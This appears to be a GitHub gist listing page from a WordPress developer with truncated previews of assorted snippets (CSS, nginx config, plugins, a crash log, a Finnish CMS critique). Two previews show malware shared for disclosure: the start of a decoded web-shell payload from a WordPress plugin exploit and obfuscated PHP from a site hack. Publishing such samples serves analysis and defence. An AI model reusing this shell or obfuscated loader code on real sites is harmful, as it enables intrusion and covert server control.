Skip to content

Instantly share code, notes, and snippets.

View anttiviljami's full-sized avatar
💜
Be kind.

Viljami Kuosmanen anttiviljami

💜
Be kind.
View GitHub Profile
@anttiviljami
anttiviljami / common.php
Created February 2, 2017 11:37
Decoded payload from blogvault backup WordPress plugin exploit
<?php
$auth_pass = "43c28ae888b07543fd3c492620b2d10c";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
@anttiviljami
anttiviljami / response.md
Last active December 13, 2018 08:33
Innowise CMS vs. WordPress (annotoitu)

Linkki alkuperäiseen artikkeliin: http://www.innowise.fi/fi/innowise-cms-vs-wordpress/

part1

part2

part3

1)

WordPress tukee out-of-the-box useita erilaisia käyttäjäryhmiä jotka on jaettu eri rooleihin. Pääkäyttäjän rooli on tarkoitettu sivuston tekniselle ylläpitäjälle, kun taas roolien Päätoimittaja, Kirjoittaja ja Avustaja ylläpitonäkymät on karsittu vähemmän teknisille ylläpitäjille sopiviksi. WordPressin rooleilla voi myös rajoittaa eri ryhmien käyttöoikeuksia esimerkiksi antamalla Avustaja-roolin vain muokata sivuja, muttei julkaista niitä ilman Päätoimittajan tai Pääkäyttäjän lupaa.

@anttiviljami
anttiviljami / mysqld.log
Created December 2, 2016 08:56
2016-12-02 shard3 crash log
2016-12-02 8:40:33 139992479299328 [Note] WSREP: (173c558a, 'tcp://0.0.0.0:40047') connection to peer 4ceca44b with addr tcp://10.1.10.91:40047 timed out, no
messages seen in PT3S
2016-12-02 8:40:33 139992479299328 [Note] WSREP: (173c558a, 'tcp://0.0.0.0:40047') connection to peer dee5e459 with addr tcp://10.1.8.195:40047 timed out, no
messages seen in PT3S
2016-12-02 8:40:33 139992479299328 [Note] WSREP: (173c558a, 'tcp://0.0.0.0:40047') turning message relay requesting on, nonlive peers: tcp://10.1.10.91:40047
tcp://10.1.8.195:40047
2016-12-02 8:40:34 139992479299328 [Note] WSREP: (173c558a, 'tcp://0.0.0.0:40047') connection established to 4ceca44b tcp://10.1.10.91:40047
2016-12-02 8:40:34 139992479299328 [Note] WSREP: (173c558a, 'tcp://0.0.0.0:40047') reconnecting to dee5e459 (tcp://10.1.8.195:40047), attempt 0
2016-12-02 8:40:34 139992479299328 [Note] WSREP: (173c558a, 'tcp://0.0.0.0:40047') connection established to dee5e459 tcp://10.1.8.195:40047
2016-12-02 8:40:37 139992479299328 [Note] WSRE
@anttiviljami
anttiviljami / wp-admin-modal-dialog.php
Last active October 9, 2024 00:34
WordPress admin modal dialog example
<?php
// enqueue these scripts and styles before admin_head
wp_enqueue_script( 'jquery-ui-dialog' ); // jquery and jquery-ui should be dependencies, didn't check though...
wp_enqueue_style( 'wp-jquery-ui-dialog' );
?>
<!-- The modal / dialog box, hidden somewhere near the footer -->
<div id="my-dialog" class="hidden" style="max-width:800px">
<h3>Dialog content</h3>
<p>This is some terribly exciting content inside this dialog. Don't you agree?</p>
@anttiviljami
anttiviljami / index.php
Created August 26, 2016 10:54
New WordPress hack in the wild
<?php
//header('Content-Type:text/html; charset=utf-8');
$O0_0O0_O_O='J6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$OOO0_0_O_0='mazama2648';
$OO00O_O0__=1639;
$O0O00__OO_='B/A/C_rimu-molasses/laudanidine/D-E/';
$O0OOO_00__=233;
$O0O0_0O__O=1;
$O__00_OO0O=array("coenenchyma","disinfestation","causable","intercept","antirattler","inveracity","forgery","errantly","beaverboard","hemoglobinocholia","hibito","affination","gourde","fustic","acroceraunian","battleship","areotectonics","inflexibility","hymnodical","monticoline","canny","exilement","leasehold","metastasis","absorbency");;
$O0_00OO__O=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_0O__0O0O=$O0_00OO__O{26}.$O0_00OO__O{6}.$O0_00OO__O{10}.$O0_00OO__O{30}.$O0_00OO__O{29}.$O0_00OO__O{26}.$O0_00OO__O{30}.$O0_00OO__O{38}.$O0_00OO__O{6}.$O0_00OO__O{18}.$O0_00OO__O{23}.$O0_00OO__O{10}.$O0_00OO__O{29}.$O0_00OO__O{10}.$O0_00OO__O{12}.$O0_00OO__O{5}.$O0_00OO__O{30}.$O0_00OO__O{2}.$O0_00OO__O{35}.$O0_
@anttiviljami
anttiviljami / wp-adminbar.css
Created August 24, 2016 20:14
WordPress Adminbar CSS offset
.customize-support nav { position: relative; top: 32px; }
@media ( max-width: 782px ) {
.customize-support nav { position: relative; top: 46px; }
}
@media ( max-width: 600px ) {
.customize-support nav { position: absolute; top: 46px; }
}
@anttiviljami
anttiviljami / allow-email-as-username.php
Created March 3, 2016 09:19
A wordpress mu-plugin that allows you to create users with email-addresses as usernames in multisite
<?php
/**
* Plugin name: Allow email as WordPress Network/Multisite username
* Description: A wordpress mu-plugin that allows you to create users with email-addresses as usernames in multisite
* Version: 1.0
* Author: @anttiviljami
* License: GPLv3
*/
add_filter( 'wpmu_validate_user_signup', '_signup_allow_email_as_username' );
@anttiviljami
anttiviljami / nginx.conf
Last active February 26, 2016 20:20
Setting a header based on upstream header
map $sent_http_x_wp_embed $frameoptions {
'' SAMEORIGIN;
'something' 'ALLOW-FROM http://mywebsite.com';
}
server {
...
add_header X-Frame-Options $frameoptions;
}
@anttiviljami
anttiviljami / indicate-shadow.php
Last active February 9, 2016 19:47
Shadow Indicator
<?php
/**
* Plugin name: Shadow Indicator
* Author: Antti Kuosmanen / Seravo Oy
* Version: 1.0
*
* Show the user which environment we're in at all times
*/
add_action('wp_head', '_indicate_environment');
add_action('admin_notices', '_indicate_environment');